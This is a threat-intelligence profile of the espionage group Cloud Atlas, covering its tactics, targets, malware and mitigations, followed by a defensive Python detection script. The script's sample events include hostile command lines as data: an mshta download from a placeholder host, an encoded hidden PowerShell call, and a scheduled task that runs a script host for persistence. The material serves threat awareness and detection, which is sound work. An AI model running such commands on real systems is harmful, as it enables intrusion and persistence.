The experienced Cloud Atlas group remains active, continuing to target government sectors and diplomatic entities in Russia and Belarus, employing both new and established techniques to maintain persistence in compromised systems.
# Threat Actor: Cloud Atlas
## Attribution & Identity
Cloud Atlas (also known as **Inception**) is an experienced and sophisticated cyber-espionage group that has been active since at least 2014. While no state attribution has been publicly confirmed, its targeting is consistently aligned with geopolitical intelligence gathering.
## Activity Summary
The group remains highly active, recently executing campaigns focused on maintaining long-term persistence within high-value networks. Their recent operations involve an evolution of their toolset, moving away from older, well-known backdoors toward more modular and elusive malware to bypass modern EDR and antivirus solutions. They have specifically updated their infection chains to include new techniques for initial access and lateral movement.
## Tactics, Techniques & Procedures
- **Spear-phishing:** Crafting highly tailored emails with malicious attachments (often .doc or .rtf) to gain initial entry.
- **Template Injection:** Utilizing remote template injection to download malicious payloads after the document is opened.
- **Living-off-the-Land (LotL):** Using legitimate system tools (like PowerShell and MSHTA) to execute code and avoid detection.
- **Scheduled Tasks:** Establishing persistence by creating scheduled tasks that trigger malware execution at specific intervals.
- **Multi-stage Payloads:** Deploying a complex chain of loaders to decrypt and execute the final backdoor in memory.
- **Polymorphic Code:** Shifting code structures to evade signature-based detection.
## Targeting
- **Sectors:** Government sectors, diplomatic entities, international organizations, and aerospace/research institutes.
- **Geography:** Primarily focused on **Russia** and **Belarus**, with historical targeting seen in Ukraine, Turkey, and other Eastern European or Central Asian countries.
- **Victims:** Foreign ministries, embassies, and government administrative offices.
## Tools & Infrastructure
- **Malware Families:**
  - **PowerShower:** A PowerShell-based backdoor used for initial reconnaissance and environment tasking.
  - **VBShower:** A VBScript-based downloader/backdoor.
  - **Cloud Atlas Backdoor:** Their custom, modular C++ malware designed for file exfiltration and system command execution.
- **Infrastructure:**
  - **C2:** Historically known for using legitimate cloud service providers (like OpenDrive) for Command and Control to blend in with normal traffic.
  - **Defanged Hosts:** hxxps[://]opendrive[.]com (used for data exfiltration and tasking).
## Implications
Cloud Atlas represents a persistent and patient threat. Their ability to refine their TTPs over a decade suggests a high level of operational maturity. By targeting diplomatic and government entities in Russia and Belarus, they are likely engaged in high-level political espionage. Their shift toward "fileless" techniques and the use of legitimate cloud services makes them particularly difficult to detect for organizations lacking advanced behavioral monitoring.
## Mitigations
- **Email Security:** Implement advanced sandboxing and attachment filtering to catch remote template injection and malicious macros.
- **Endpoint Monitoring:** Deploy EDR solutions to monitor for suspicious PowerShell, `mshta.exe`, and `cmd.exe` activity, which are core to the actor's execution chain.
- **Cloud Traffic Analysis:** Monitor and audit traffic to public cloud storage providers; flag unusual or frequent data uploads from administrative workstations to services like OpenDrive.
- **Restrict Scripting:** Disable macros and restrict the PowerShell execution policy to "AllSigned" where possible to prevent unauthorized scripts from running.
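As an added defender-side example (not part of the report), the following Python triage script runs over constructed Sysmon-style process-creation events and flags the stages of the execution chain described above: an Office document spawning `mshta.exe` or PowerShell (remote template injection leading to living-off-the-land execution), an encoded PowerShell command line, and a scheduled task whose action is a script host. All event fields, paths and commands are constructed samples.

```python
"""Flag process-creation events that match the report's execution chain.
Event tuples are (parent_image, image, command_line); all values constructed."""
import re

EVENTS = [
    ("explorer.exe", "WINWORD.EXE", r"WINWORD.EXE /n C:\Users\u\Downloads\note.rtf"),
    # Office spawning a script host: typical of remote template injection
    ("WINWORD.EXE", "mshta.exe", "mshta.exe https://example.invalid/t.hta"),
    # Encoded command line; payload replaced by a placeholder
    ("mshta.exe", "powershell.exe", "powershell.exe -nop -w hidden -enc <base64-placeholder>"),
    # Persistence: scheduled task whose action is a script host
    ("powershell.exe", "schtasks.exe",
     r'schtasks.exe /create /sc minute /mo 30 /tn "Updater" /tr "mshta.exe C:\ProgramData\u.hta"'),
    # Benign admin activity that should not fire
    ("explorer.exe", "powershell.exe", r"powershell.exe -File C:\Scripts\inventory.ps1"),
    ("svchost.exe", "schtasks.exe", r'schtasks.exe /create /sc daily /tn "Backup" /tr "C:\Tools\backup.exe"'),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "wordpad.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b")
TASK_ACTION = re.compile(r'/tr\s+"?([^"\s]+)')  # first token of the /tr argument


def classify(parent, image, cmdline):
    """Return detection labels for one event (empty list if nothing matched)."""
    p, i, c = parent.lower(), image.lower(), cmdline.lower()
    hits = []
    if p in OFFICE and i in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")
    if i == "powershell.exe" and ENCODED_FLAG.search(c):
        hits.append("powershell_encoded_command")
    if i == "schtasks.exe" and "/create" in c:
        m = TASK_ACTION.search(c)
        # Compare only the executable name, so a full path to mshta.exe still matches
        if m and m.group(1).rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
            hits.append("schtask_runs_script_host")
    return hits


def scan(events):
    """Return (event_index, labels) for every event that produced at least one label."""
    flagged = []
    for idx, (parent, image, cmdline) in enumerate(events):
        hits = classify(parent, image, cmdline)
        if hits:
            flagged.append((idx, hits))
    return flagged


if __name__ == "__main__":
    for idx, hits in scan(EVENTS):
        print(idx, EVENTS[idx][1], hits)
```

In a real deployment the same three rules would run against Sysmon Event ID 1 or Windows Security 4688 records rather than an in-memory list; the Office-to-script-host rule is the one most worth alerting on outright, while the other two benefit from allow-listing known administrative scripts.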